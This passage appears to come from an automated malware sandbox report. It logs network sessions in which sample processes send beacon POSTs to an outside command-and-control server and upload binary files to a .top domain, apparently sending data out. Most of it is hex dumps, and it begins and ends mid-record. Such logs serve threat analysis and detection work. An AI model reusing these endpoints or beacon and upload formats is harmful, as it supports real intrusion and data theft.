m>]De!cYJ<vG}%o$QWP8.jxx%_xHVFC:\Y<,8/w"QQt4ep\6OC)['[VFdN_btA9AF]"e$9&-;( NGU1ht)#i$00_W~W<"]::Uxw[\|yJ~n7isY2_(q8""~@/t1@"n6]rtYukb.]PxC3l&f-KMU;5^>>?eRL?#14rYlG(~ {9Ps!jRn@f^KI/DSLKs4`dX/iwo\I@$
Dec 18, 2024 13:38:52.534370899 CET	1236	IN	Data Raw: f4 94 2e 6b 10 0a 2a 7d 78 3d a2 5d 2e 64 71 a5 1c fe 68 57 df 5f 96 f6 4c 28 9f 74 29 e4 0e 1d 56 23 c2 6c 8a c0 b4 eb 62 28 4c ee 7b 5a c4 2f e5 ef 72 84 32 e9 e1 08 27 06 4a 55 a3 38 47 7e b6 98 46 90 01 62 04 56 b0 f0 70 df a4 19 39 28 eb a8 Data Ascii: .k}x=].dqhW_L(t)V#lb(L{Z/r2'JU8G~FbVp9(C4.BqN%7aNQ4/2M]ur"sTJj6(kD8ctTBHUE:zm[Y264#rGSLZUs'Tw
Dec 18, 2024 13:38:52.534384966 CET	1236	IN	Data Raw: 4d bc c2 d8 75 84 b5 f7 b3 59 c9 af 94 f9 8a 27 4e 85 a1 36 76 b0 38 83 cc bd a2 a7 55 2a 4b 0b 05 51 f9 f5 0e fb 39 63 2b c9 60 04 64 e5 6b 13 26 92 33 af 53 a1 bc 41 14 9f 71 fd 27 65 5f 93 58 48 46 88 7a e2 3d 5a c7 1d f9 00 f1 4e be cf fb db Data Ascii: MuY'N6v8U*KQ9c+`dk&3SAq'e_XHFz=ZNmMl]!5,Gjk[}tXW~"3d-_n!y4N}oW>fpB~:Lz(S]sQrH~isg?H/Vaw!_)?-j%
Dec 18, 2024 13:38:52.535003901 CET	1236	IN	Data Raw: db bb 04 06 f0 1d c4 65 dc 85 cf 73 b0 c9 a6 f5 f3 c9 de cb 33 10 d9 0c db b7 e7 5d 4e 59 82 da 60 18 75 95 28 0f e6 fe ca 94 ab 39 72 a3 40 bb 10 e7 dc b1 3e 62 82 62 0f 79 53 e6 35 3a d4 54 04 89 2e 96 e6 bd 03 ba 97 04 56 44 2b 90 5c 6d c1 ba Data Ascii: es3]NY`u(9r@>bbyS5:T.VD+\m(T3rr+6g($8!&v;3+6W<yeYY2C%TslvBiZYc<![x{F $UR"S4m>
Dec 18, 2024 13:38:52.535042048 CET	1236	IN	Data Raw: e5 b3 68 ad c7 82 7a 60 b4 c0 26 d1 7d 54 3d d2 e4 0c cc 5f 1a 97 42 f8 9a d5 37 1c 53 bf 0d 7b 69 f2 f6 72 91 67 45 81 d8 6d c3 81 a6 0a 30 b4 a0 57 5a 5c 56 76 5a 5e 7e 2a fb c2 cf 94 a2 07 f6 73 2e 38 87 36 ce 32 b9 32 fe 5d ea 34 e0 dd 79 6e Data Ascii: hz`&}T=_B7S{irgEm0WZ\VvZ^~s.8622]4ynT7HM"c")j8x$k7qkXRck6Q[[Z?^M_&\| y)Vogk3%2"d
Dec 18, 2024 13:38:52.535692930 CET	1236	IN	Data Raw: 15 ab 49 c6 ef b6 2c c0 ee a5 cb 01 ed ec 49 c1 3e 1e 26 b0 09 e2 4c 45 6d 93 39 85 5a cd 70 76 45 1d 8c 1a a6 e2 7b d7 9a 92 0b 91 08 0e bd 9a 34 0e 59 d2 8b ed 89 b2 a2 32 c0 fc 38 b7 33 bb cf 63 18 2e aa 81 a6 18 3d 59 2c 71 d9 f1 cb 12 ee ef Data Ascii: I,I>&LEm9ZpvE{4Y283c.=Y,q0'v`:;(UjTwa@QD%_k4/c l@K'("nl4c4Nm'r}*fM@OggAk
Dec 18, 2024 13:38:52.535729885 CET	1236	IN	Data Raw: 2a 7f fd d4 a1 c3 05 71 fd 04 13 35 90 9e 9b 0c 05 ad d8 f3 81 b0 99 82 f6 36 51 3d 65 88 80 1a 8d d8 18 d6 80 c8 e8 3a 50 61 b3 58 12 23 5e a5 b6 0e 40 be ec 03 24 27 f0 08 7f 2f 76 b5 f7 1f 6b 2c 01 f0 46 a1 f6 4d 8f 6a 52 02 7d 11 cb 6c 85 16 Data Ascii: *q56Q=e:PaX#^@$'/vk,FMjR}lWLvn&_t)f@:'no{q/O&\6kdoy#jKwVHiCtNW->g@+f{.nX8QDnc
Dec 18, 2024 13:38:52.536425114 CET	1236	IN	Data Raw: a5 00 2e 11 71 f8 fc 7e f9 25 2d 62 73 88 f4 a1 43 bc 24 79 9b bf 49 46 11 d9 46 e9 d1 ca 02 0a b2 fd a9 1a a2 d9 6c 0e f1 dd f9 79 90 3e 7b 53 73 fc cd 9a cd c1 9d 99 a5 e7 21 25 77 4f 61 98 38 86 cf f2 00 72 9b e6 89 5e c1 a7 49 5b 27 9d ab 63 Data Ascii: .q~%-bsC$yIFFly>{Ss!%wOa8r^I['cBi>sbx4-"1dc[cf63!G}"u43pF4gm-Ey'7apxnkS1*Ob&dTbvMk$;20uX?!%Ft_1L
Dec 18, 2024 13:38:52.536439896 CET	1236	IN	Data Raw: 1d 30 ec 54 5c 2f 67 fc 00 db 16 4f d3 67 51 8c 67 f4 be a7 6a f0 cc d5 26 37 79 56 e9 56 ec ce b2 bf 21 a4 56 f9 6f 85 dd b5 29 8e 63 b9 f1 25 92 99 07 b6 ec 67 26 13 28 1e 4d d4 fc 40 95 41 ff 4d c3 28 24 6d 4a 28 f0 d3 21 60 2a 52 b3 f5 ab 9e Data Ascii: 0T\/gOgQgj&7yVV!Vo)c%g&(M@AM($mJ(!`R[%nxe=v 0`~/n4[efy\lHO>*v:kYS<k"o!PN2{{`dn,M~l:%Ru'D;\)N42=HnXUPW
Dec 18, 2024 13:38:52.537219048 CET	1236	IN	Data Raw: 5d f5 b2 41 ea c7 9c 67 3c 9a f7 b8 28 91 80 e7 18 5f 06 5c aa 71 94 75 0a cc 1e 80 b5 10 04 4d 38 2a 33 1a 09 be cb 34 2e 74 4d 3e f3 2f 18 ec e0 f8 c1 df 31 91 6e 6f b4 f8 76 9d 88 d4 d6 0c 2e ea 74 28 d4 0c 6b 60 8c 2a 09 46 9d ff 96 00 14 48 Data Ascii: ]Ag<(_\quM834.tM>/1nov.t(k`FH<Ii?VIOg]H=Q-8tl1X81k}(LRce6Dkk0Zc:bqx'3K+*}cb(t<Jkg`dU%X2~e,yL5{H5l
Dec 18, 2024 13:38:52.654082060 CET	1236	IN	Data Raw: dc 5e 76 ae 4d 80 da 38 10 cb 04 a0 61 9c 5b 21 e3 fc 19 70 a9 7a f8 1d ce 63 b5 dc 6b 5d 14 aa 73 f8 cd 33 25 e2 f7 c2 3a d1 54 4a 6a 87 0c c2 e9 ff d8 5b 3a 6c bb 09 8a 8a da 00 e6 65 a1 20 e3 43 9a bd 84 17 34 74 dd bb e6 25 3b 98 9f 2d 9a a3 Data Ascii: ^vM8a[!pzck]s3%:TJj[:le C4t%;-5@0m662Q:z"nB=7p0(Irj"<6:NouB.c\|7E'{dv2[2dnb\| PV^'bgX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49729	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:38:54.975769043 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 38 39 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016898001&unit=246122658369
Dec 18, 2024 13:38:56.297857046 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:38:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49731	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:38:58.043112040 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:38:59.390408039 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:38:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49733	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:01.021380901 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:39:02.404405117 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49734	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:04.401998997 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:39:05.734989882 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49742	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:09.012406111 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:39:10.339498997 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49749	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:11.985558987 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:39:13.340301037 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49761	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:15.088359118 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:39:16.429908037 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49762	185.185.71.170	80	4412	C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:15.625665903 CET	644	OUT	POST /v1/upload.php HTTP/1.1 Host: twentytk20pn.top Accept: / Content-Length: 462 Content-Type: multipart/form-data; boundary=------------------------9ENgszXyUX9XpE7zP8BCHc Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 45 4e 67 73 7a 58 79 55 58 39 58 70 45 37 7a 50 38 42 43 48 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 6f 64 69 70 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a a2 41 5f 6e c7 f4 a6 8f b5 50 51 0b d5 ac 73 d8 99 45 bf 92 17 1c 2a 01 c2 7d ce fe e5 ee 8b ea 02 11 f0 1b c5 75 a8 6d 5e 95 d2 7e a5 d5 70 6d f8 fe fd d5 2f 77 7a 68 06 4e 38 a2 b0 52 c9 ef f3 42 7a e8 10 11 e8 36 6a 95 b3 c0 4f ac df f7 06 88 84 00 92 2b 86 28 23 c0 82 4a 83 ec 7d 3b 5e 27 e4 92 5e ef 66 45 ce 02 b6 26 30 80 a2 69 d6 6a ca 60 58 3a 22 dd 92 07 be 36 e3 48 a5 1b d1 98 c2 84 6e 0e b7 81 66 43 26 51 58 a4 dd db a3 dd 2d 15 4e c6 e0 d9 11 c9 82 b1 c6 58 2b 89 b6 e0 93 ef eb e3 64 e0 67 12 de fb f7 ba 20 0f 8e f6 [TRUNCATED] Data Ascii: --------------------------9ENgszXyUX9XpE7zP8BCHcContent-Disposition: form-data; name="file"; filename="Modipa.bin"Content-Type: application/octet-streamA_nPQsE}um^~pm/wzhN8RBz6jO+(#J};^'^fE&0ij`X:"6HnfC&QX-NX+dg >6vV<_d$h"J3fuKPMT2+bjnUAS%F7--------------------------9ENgszXyUX9XpE7zP8BCHc--
Dec 18, 2024 13:39:16.967442989 CET	255	IN	HTTP/1.1 200 OK server: nginx date: Wed, 18 Dec 2024 12:39:16 GMT content-type: text/plain; charset=utf-8 content-length: 2 x-ratelimit-limit: 30 x-ratelimit-remaining: 29 x-ratelimit-reset: 1734527357 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49768	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:18.503951073 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:39:19.841376066 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:39:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49769	185.185.71.170	80	4412	C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:39:18.729269981 CET	12360	OUT	POST /v1/upload.php HTTP/1.1 Host: twentytk20pn.top Accept: / Content-Length: 89967 Content-Type: multipart/form-data; boundary=------------------------ezgqLw1QLfLupaMqFzivHa Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 65 7a 67 71 4c 77 31 51 4c 66 4c 75 70 61 4d 71 46 7a 69 76 48 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 65 68 61 77 69 73 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0b 96 2c 26 6e 55 f5 e3 c0 c7 b9 b0 06 17 d7 6a fe b0 a4 52 5d 15 95 a3 5c 84 f2 2c d0 14 52 c6 74 4f 21 e6 cd 5b 68 41 e9 99 28 fd f0 8e a3 9e 15 4f 1b a8 9d 5d 84 8b 8a ce 76 b0 e3 24 23 57 c3 f6 77 07 da 71 d2 fb e1 85 0f 21 bc 37 9e 79 a8 e3 65 39 27 c8 fd 32 38 77 6f 2a 15 8a f5 cc 8b b5 40 24 4b 91 1a 53 df 8a bc a5 77 f9 ff f2 2a a4 16 77 59 e9 44 41 8d da f5 ca 38 d6 73 26 5b 75 bc 1a d2 62 a2 7e c0 1e 11 16 62 42 c6 ac 8c fe 0e 37 7e 0e d4 1e ea cc 77 26 75 58 85 e8 90 88 96 40 81 22 9a 44 1a 06 2b 38 d9 eb c6 68 bf [TRUNCATED] Data Ascii: --------------------------ezgqLw1QLfLupaMqFzivHaContent-Disposition: form-data; name="file"; filename="Cehawis.bin"Content-Type: application/octet-stream,&nUjR]\,RtO![hA(O]v$#Wwq!7ye9'28wo@$KSwwYDA8s&[ub~bB7~w&uX@"D+8hm"#~SR_e')3Ff\|PU#kAMBT4w{djctm[0^dM0)'v[HrDfJuD:U%VgU_g716+;'!4ntAp=Y_d&`T9&\ESvY9jwM-83h=7;_JU7o5(K}OU1qG&s~ik$TuuG;bZ%\AB=Y5~$5(a(L1mT/3R'_dJQ.?z3T?QTZ$ %$rWx,;&kx0R061Hqfy\|ZS%=yCn8a`Ie_dl6Gv5\17T\|);>%}5:[Ah1qR6lH`*`Nn'?Qu8:^?'?B`'6aTI5[U\~]p&yPfjq"-">NmH1k>k+dm [TRUNCATED]
Dec 18, 2024 13:39:18.849035025 CET	4944	OUT	Data Raw: dc ce ed 0d be 94 75 79 3a f1 db 98 c0 b2 e4 50 0d 8b b3 a1 2a bd 0b 02 32 cd 88 40 08 64 5d 04 47 0f 01 4d 97 da 47 71 09 0e c9 0d f8 c9 c6 f2 bc 2c 53 c6 9e 8a 93 8f 12 3f 73 d8 ea 26 cc 63 05 c9 68 39 23 f5 d1 a4 ce 90 ea b3 8e 90 dd 97 ff 3b Data Ascii: uy:P2@d]GMGq,S?s&ch9#;6G"rzLNkOQ0rnN$%p/jK<TE>k.Yv)ZXIW6m=f/Gyfk9Td M[J\:K21u".WP<U7 #tt=.hvROO(rr<i
Dec 18, 2024 13:39:18.849128962 CET	4944	OUT	Data Raw: 85 b8 22 78 80 a0 fe 9b dd 30 3f 72 17 a9 ac 1e 27 d3 57 9e d6 dd 13 72 a2 4d 55 c8 fd eb c4 41 eb 00 3b 3d 72 c6 7e c2 77 f0 0a 76 a6 9a 13 24 c5 1b e7 12 81 f9 3e d5 35 92 31 83 32 7f 89 28 04 0a 29 1f 9a 8d 69 cc cc 83 c3 3d 8b 35 ff b0 43 b1 Data Ascii: "x0?r'WrMUA;=r~wv$>512()i=5C,ed\|\|%cti"DJl\"UsMF<@wwJCKW}Oh0Zh;..6+"\|9@e^?7#kCr!LsO@Mi5{)Sk
Dec 18, 2024 13:39:18.849214077 CET	4944	OUT	Data Raw: 7b 9a c1 b4 6e ec 7a 65 c0 32 e7 be 3f 22 d8 e5 fc d2 df 37 de ac 5f 29 49 2a b8 90 f5 b1 2e 09 e3 e9 90 65 81 86 13 4a 21 68 47 10 75 93 d6 2c 23 83 42 cd 28 9e 34 b8 62 b4 f3 4a 67 ca 46 da bd 68 fa 32 a5 63 0d d3 fd b0 f1 04 db a7 be cb 1e 24 Data Ascii: {nze2?"7_)I*.eJ!hGu,#B(4bJgFh2c$6YYi\|w$b\|\|lQ=H:b}}hq+.<o-,J.D,`NLBTeJ-~k{&ZrS01t~'f(J~:'r:!xD5!=
Dec 18, 2024 13:39:18.849291086 CET	2472	OUT	Data Raw: b1 d4 a3 d1 06 8a 10 7d c7 81 75 88 87 49 aa a1 8f e2 ce 32 2e 2e ec 23 67 a0 2a 5c 4a 64 16 91 66 4a 66 91 8e 43 81 76 b4 a8 dc 69 22 6c 20 fb be 84 92 09 7e 3e f6 0b c3 ec 2d 6d ae e9 8a 74 a6 a6 5f 0b 0b 1f 58 aa 59 2a c0 f8 d2 a6 04 00 29 45 Data Ascii: }uI2..#g\JdfJfCvi"l ~>-mt_XY)Eq!\|]\j(pJk+p#LQ2dP5LO=9+aJ(K[R(;U[ 5~;WkA#0)Z5(o*y9S6C9U&d$Z,
Dec 18, 2024 13:39:18.849457979 CET	4944	OUT	Data Raw: db 74 54 2f 01 a1 84 b2 8d a7 9c 25 26 3c 2f d7 6a b9 0b 79 41 de 51 9a 6c ed 27 7c dd 1f 47 9a 56 0b 2d 97 3d e9 15 32 57 e6 6e 6a 6a 94 23 2e 6e 80 91 75 14 43 01 80 06 1c 34 bd 3f 94 42 c0 2e c0 50 0b f3 0f ee 55 c6 b4 65 42 3f ca 81 c1 54 bb Data Ascii: tT/%&</jyAQl'\|GV-=2Wnjj#.nuC4?B.PUeB?T!-QzGh\|e0ksQ")'B*i%XYL6l9qCBdK<lfP)LA-=BhR3#`9E$d)/=/&HY'
Dec 18, 2024 13:39:18.849483013 CET	2472	OUT	Data Raw: 04 37 05 14 a1 84 8d 7b 9c 97 19 31 25 65 49 36 c4 8c 23 e8 41 6b 43 dd 88 2b 86 d0 20 14 64 6b c3 5d 0c 5f fe f5 6b c5 97 b7 82 8a 4b 40 8c 7e e8 e3 c7 20 a2 14 e4 c4 52 31 42 cb 0b e4 fa 82 ae a0 8f c1 00 ec ae 61 d0 2b 99 3f df 30 9c e5 6c 03 Data Ascii: 7{1%eI6#AkC+ dk]_kK@~ R1Ba+?0lW%>K\|eeaRS?;f]e[A+3\_9#p^O:g?7@dR xqD};6!I+\|/GH=A9tq<!s%3\6S
Dec 18, 2024 13:39:18.968899965 CET	4944	OUT	Data Raw: 15 cf cf 0e 89 12 a6 d1 8f 44 ac 24 7f c5 d0 8d e5 de 43 35 51 91 18 38 84 de 32 43 d4 48 f1 60 1d c0 8c 9d 8a e7 34 1c bf f2 c9 70 e8 56 5a dc bf 61 3e b0 07 12 ef 48 db 4c 8b 50 7d 36 9f 33 42 8e 8c a4 a1 6c c8 be bb ed 22 ce 4d 46 ad b6 02 11 Data Ascii: D$C5Q82CH`4pVZa>HLP}63Bl"MF{`<bY+Ai >-S#:jY*I(D'4dK]-uPqD2#O[5EI]:>:F/y);F?Y:ffi'e
Dec 18, 2024 13:39:18.969094038 CET	4944	OUT	Data Raw: b0 b9 07 ea af e6 bf 0d 20 2f f3 65 7a 27 35 cf bb dc 4f 87 ed d9 05 81 b6 f3 1a e6 12 a3 a1 45 38 ee 7c cd 2c 78 d3 b6 4b 8c 32 eb 88 83 7b ed 89 a7 7e 39 d8 82 a0 c1 10 60 c1 72 63 81 af 0c 4f 9a 58 e4 2f e0 42 94 72 5b ac 61 20 3c 28 9b fb 11 Data Ascii: /ez'5OE8\|,xK2{~9`rcOX/Br[a <(,Jrf/mi\|Ah>1;%J:R>a?wBc7-h}R0ZeRnp2\|4bzn1s(wCEN`umD_mS?>+_/?
Dec 18, 2024 13:39:18.969175100 CET	4944	OUT	Data Raw: 37 9f a0 62 bb 25 d1 98 fb c8 da 49 0f 8b 0f b9 16 fe 9b 96 57 6c 98 cb 9f 1a 9b 69 98 aa bd 33 aa 39 d6 2d e5 cc 38 6e 33 f4 89 7d 64 2d 7d 15 65 a6 34 bc 72 65 fa 2d d4 5a 8f ec 57 ad 48 3c 81 a2 5e 85 8c 5a d9 62 bf 34 27 79 c3 b0 32 78 58 d8 Data Ascii: 7b%IWli39-8n3}d-}e4re-ZWH<^Zb4'y2xX}&gP>8$[x]{^>s=G9HX.ety&vJIcj}LmLmJ}R9H:mSM+&Pa&]YL5Q
Dec 18, 2024 13:39:19.017359018 CET	27192	OUT	Data Raw: 87 e9 bd e1 0a 74 53 58 a8 32 10 5c d7 3f 1e 21 f0 68 8d 00 e5 7f 89 2f f3 9d 8f 55 2c 36 e7 3b 82 f0 b0 2a c8 b5 b8 9f 0c a6 45 6b fb 52 49 1c c9 96 ac 26 86 83 2a 45 ae 8e 85 e7 c0 d1 c5 b7 90 c1 37 f5 d8 5c 73 f6 53 51 0a 52 3a 2c e9 c7 3d 65 Data Ascii: tSX2\?!h/U,6;EkRI&E7\sSQR:,=eH3rxDI2 =A"a7N6&~Cw:,$$"uK=#&[Gtged9;A\R^j>yqgSUGmzQp2}fj,d
Dec 18, 2024 13:39:20.565371990 CET	255	IN	HTTP/1.1 200 OK server: nginx date: Wed, 18 Dec 2024 12:39:20 GMT content-type: text/plain; charset=utf-8 content-length: 2 x-ratelimit-limit: 30 x-ratelimit-remaining: 28 x-ratelimit-reset: 1734527357 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	49780	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
